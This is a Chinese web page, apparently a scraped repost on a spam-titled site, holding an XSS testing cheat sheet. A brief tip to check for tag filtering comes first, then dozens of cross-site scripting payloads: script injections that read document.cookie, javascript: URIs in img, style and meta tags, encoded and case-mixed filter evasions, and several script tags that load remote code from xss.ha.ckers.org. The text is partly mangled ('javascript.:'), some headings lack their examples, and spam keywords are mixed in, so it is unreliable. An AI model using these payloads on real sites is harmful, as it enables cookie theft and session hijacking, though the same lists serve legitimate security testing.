當前位置：首頁 > news >正文

茶葉網(wǎng)站開發(fā)seo網(wǎng)絡(luò)培訓機構(gòu)

news 2025/7/15 4:26:34

茶葉網(wǎng)站開發(fā),seo網(wǎng)絡(luò)培訓機構(gòu),網(wǎng)站開發(fā)設(shè)計作業(yè)及代碼,火車頭 wordpressXSS測試語句在測試網(wǎng)站是否存在XSS漏洞時，應(yīng)該輸入一些標簽如<,>輸入后查看網(wǎng)頁源代碼是否過濾標簽，如果沒過濾，很大可能存在XSS漏洞。 <h5>1</h5> <span>1</span> <SCRIPT>alert(document.cookie)&l…

XSS測試語句

在測試網(wǎng)站是否存在XSS漏洞時，應(yīng)該輸入一些標簽如<,>輸入后查看網(wǎng)頁源代碼是否過濾標簽，如果沒過濾，很大可能存在XSS漏洞。

?<span>1</span>

<SCRIPT>alert(document.cookie)</SCRIPT>

閉合

"><span>x</span><"

'>"<span>x</span><'

其他測試語句

>"'><img src="javascript.:alert('XSS')">

>"'><script>alert('XSS')</script>

<table background='javascript.:alert(([code])'></table>

<object type=text/html data='javascript.:alert(([code]);'></object>

"+alert('XSS')+"

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

<script>alert('Vulnerable')</script>

a.jsp/<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

<IMG SRC="javascript.:alert('XSS');">

<IMG src="/javascript.:alert"('XSS')>

<IMG src="/JaVaScRiPt.:alert"('XSS')>

<IMG src="/JaVaScRiPt.:alert"("XSS")>

<IMG SRC="jav	ascript.:alert('XSS');">

<IMG SRC="jav
ascript.:alert('XSS');">

<IMG SRC="javascript.:alert('XSS');">

"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out

<IMG SRC=" javascript.:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript.:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript.:alert('XSS')">

<IMG LOWSRC="javascript.:alert('XSS')">

<BGSOUND SRC="javascript.:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet"HREF="javascript.:alert('XSS');">

<IMG SRC='vbscript.:msgbox("XSS")'>

<META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">

<IFRAME. src="/javascript.:alert"('XSS')></IFRAME>

<FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript.:alert('XSS')">

<DIV STYLE="background-image: url(javascript.:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE. TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>

<BASE HREF="javascript.:alert('XSS');//">

getURL("javascript.:alert('XSS')")

a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);

<XML SRC="javascript.:alert('XSS');">

"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG SRC="javascript.:alert('XSS')"

<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

XSS攻擊語句

輸入檢測確定標簽沒有過濾后，為了顯示存在漏洞，需要插入xss攻擊代碼。

常用的語句

(1)普通的xss JavaScript注入

(2)IMG標簽Xss使用JavaScript命令

(3)img標簽無分號無引號

(4)IMG標簽大小寫不敏感

(5)HTML編碼（必須有分號）

(6)修正缺陷IMG標簽

<IMG """><SCRIPT>alert("XSS")</SCRIPT">

(7)formCharCode標簽（計算器）

(8)UTF-8的Unicode編碼（計算器）

(9)7 位的 UTF-8 的 Unicode 編碼是沒有分號的(計算器)

查看全文

http://www.risenshineclean.com/news/65540.html

中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

茶葉網(wǎng)站開發(fā)seo網(wǎng)絡(luò)培訓機構(gòu)

XSS測試語句

XSS攻擊語句

相關(guān)文章：